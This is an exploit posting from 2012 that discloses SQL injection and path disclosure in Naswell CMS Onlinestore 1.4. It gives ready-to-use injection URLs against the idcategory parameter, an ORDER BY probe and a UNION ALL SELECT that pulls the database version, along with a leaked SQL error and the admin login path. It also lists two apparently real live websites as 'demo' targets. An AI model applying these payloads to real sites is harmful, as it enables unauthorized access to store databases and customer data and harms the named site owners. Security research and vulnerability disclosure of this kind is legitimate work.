Naswell CMS Onlinestore Multiple Vulnerability
2012-09-18 08:32:35Posted by: dementor
#######################################################################################
# Author: Mr.Dementor
# Exploit Title: Naswell CMS Onlinestore Multiple Vulnerability
# Date: 18-09-2012
# Vendor or Software Link: http://www.naswell.com.au/
# Category: WebApp
# Version: 1.4
# Type: Commercial
# Contact: [email protected]
# Website: http://www.magetan-it.org
# Greetings to:
# Best for : Handi Eko Saputro
# my Friends : tiaNG_jaWI , aSU_aBANG, Cybertaziex, Detol SevenCrew, De Vinclous, Dany Artha, BL4cKc0d1n6, Shadow Banditz.
########################################################################################
Exploit :
Sql Injection
--------------
vulnerable file ===> online_store.php?idcategory=[id]
injection ====> select, order, union, etc [ blind injection is more powerfull in some victims ]
POC :
http://some.target/online_store.php?idcategory=-335+order+by+50--
Errror Result :
Erro Seleção: SELECT *, price AS original_price, if(length(image) > 0, true, false) as hasImage, IF(( (salesPrice > 0) AND (salesPrice < price) ), salesPrice, price) AS price, IF(( (salesPrice > 0) AND (salesPrice < price) ), TRUE, FALSE) AS on_sale FROM Product WHERE showWebsite = 1 AND active = 1 AND deleteDate IS NULL AND idCategory = -335 order by 50-- ORDER BY orderProd ASC, hasImage DESC, name ASC - Unknown column '50' in 'order clause'
If possible you can use union :
http://some.target/online_store.php?idcategory=335+union+all select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+and+1=1
Note : find error column first.
Path Disclosure
-----------------
Find Admin on https://some.target/admin/login.php
Enjoy this Demo :p
https://www.alkalinecookbook.com.au/online_store.php?idcategory=335+union+all select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+and+1=1
https://www.brenniston.com.au/online_store.php?idcategory=-335+order+by+50--
Science is more important than stolen CC (y) - Submited by Mr.Dementor
Fixes
No fixesIn order to submit a new fix you need to be registered.